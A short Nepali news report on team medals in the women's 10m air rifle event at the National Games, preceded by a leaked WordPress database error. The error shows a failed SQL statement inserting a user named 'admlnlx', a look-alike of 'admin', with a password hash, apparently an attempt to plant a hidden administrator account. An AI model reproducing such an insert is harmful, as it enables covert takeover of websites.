WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKW7I/4hNDqLjTfhCGTq/6ZnhACSQE/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 02:29:57', '', 'admlnlx', 'admlnlx')
विराटनगर, पुस १२ –
पूर्वाञ्चलमा जारी सातौंँ राष्ट्रिय खेलकुदअन्तर्गत महिला १० मिटर एयर राइफल टिम इभेन्ट्समा नेपाल पुलिसले स्वर्ण पदक हात पारेको छ ।
नेपाल पुलिसकी अस्मिता राई, फूलमाया क्याप्छाकी र दुर्गा सिङ्जालीको जोडीले कुल एक हजार १२२ अङ्क हासिल गर्दै स्वर्ण प्राप्त गरेका हुन् ।
रजत पदक प्राप्त गर्न सफल मध्यपश्चिमले एक हजार ६८ अङ्क हासिल गरेर रजत पदक प्राप्त गरेका छन् । मध्यपश्चिम टिममा शान्ति विष्ट, सीता सिंह र रुशी सोमै थापामगर थिए ।
यस्तै, बीना परियार, कल्पना परियार र सुबिना तामाङ सम्मिलित नेपाली सेनाको टिमले एक हजार ५४ अङ्क प्राप्त गरेर कास्य पदक पाए । – रासस